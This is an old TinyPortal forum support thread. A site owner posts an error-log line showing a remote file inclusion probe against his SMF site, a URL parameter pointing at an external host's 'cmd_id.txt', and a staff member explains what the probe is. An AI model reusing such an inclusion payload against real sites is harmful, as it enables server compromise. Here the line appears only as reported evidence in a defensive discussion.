TP-Docs
HTML5 Icon HTML5 Icon HTML5 Icon
TP on Social Media

Recent

User

Welcome to TinyPortal. Please login or sign up.

Stats

Members
  • Total Members: 3,963
  • Latest: BiZaJe
Stats
  • Total Posts: 195,917
  • Total Topics: 21,308
  • Online today: 884
  • Online ever: 8,223 (February 19, 2025, 04:35:35 AM)
Users Online
  • Users: 0
  • Guests: 331
  • Total: 331

TPortal.php Hackers?

Started by Bluto, October 20, 2008, 01:41:06 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Bluto

October 20, 2008, 01:41:06 PM
Site:http://www.sbmtrader.com/index.php
SMF 1.1.6
TP 1.1.5
Mods:
1.  TinyPortal      1.052      
2.    Easy Edit Meta Data    1.0    
3.    SMF Trader System    1.1    
4.    SMF 1.0.14 / 1.1.6 Update    1.0    
5.    Ad Managment    2.3    ]
6.    Auto Embed Video/Audio Clips    3.1.2    
7.    Redirection Boards    2.01    
8.    Simple ImageShack    2.0.3    
9.    SMF Classifieds    1.2.9    
10. The Rules    1.06                                 
11. Activate account redirection    0.1                 
12. Integrate Lightbox

Error:
Apply Filter: Only show the error messages of this IP address  74.55.164.34    cbd08ce40e747ba54cc03a2c00b7a134
http://www.sbmtrader.com/index.php?prefix=http://linh0x.t35.com/cmd_id.txt??

8: Undefined index: 6
File: /xxxx/xxx/xxx/sbmtrader.com/Sources/TPortal.php
Line: 1574

It appears that I'm under attack. Not that that's unusual, but, is this a normal attack routine? I ask because it seamed to coincide with another support topic here: http://www.tinyportal.net/index.php/topic,26564.0.html
In that topic, I had attached a zip containing my TPortal.php. I've since deleted it.
I'm wondering if there are those " hacking types" out there who are trying to harvest files from your site to use for their advantage.
Or, is this a normal attack routine and I'm just being paranoid? Or is this not even a hacking attempt?
I'm not even sure what they're trying to do. Attach their url into my files somehow?
This is not the first one, and I have banned their IP range, but we all know how far that  get's ya.
Any insight would be helpful and hopefully you'll tell me that I am in fact just being paranoid and this is nothing unusual.
I do have the .htaccess block code on the site also and ran it once as specified. From this topic: http://www.tinyportal.net/index.php/topic,13479.0.html
Should this be run again at a regular interval?
Please take care of more important support issues first, I don't see any damage from this so far.
Thanks,
B-Lute

IchBin

#1
October 20, 2008, 10:55:53 PM
They're doing a test to see if they can hack into your site by including a file into your code. This is a well known way that hackers try to exploit servers. If they can include a file, they can then include a script of some kind to gain access to the server and all the sites on the server. Ban the user and move on. Nothing to see here... :)

Bluto

#2
October 20, 2008, 11:45:23 PM
LOL....ok folks.....everybody go home...it's over.
Print
Go Up Pages1
User actions

This website is proudly hosted on Crocweb Cloud Website Hosting.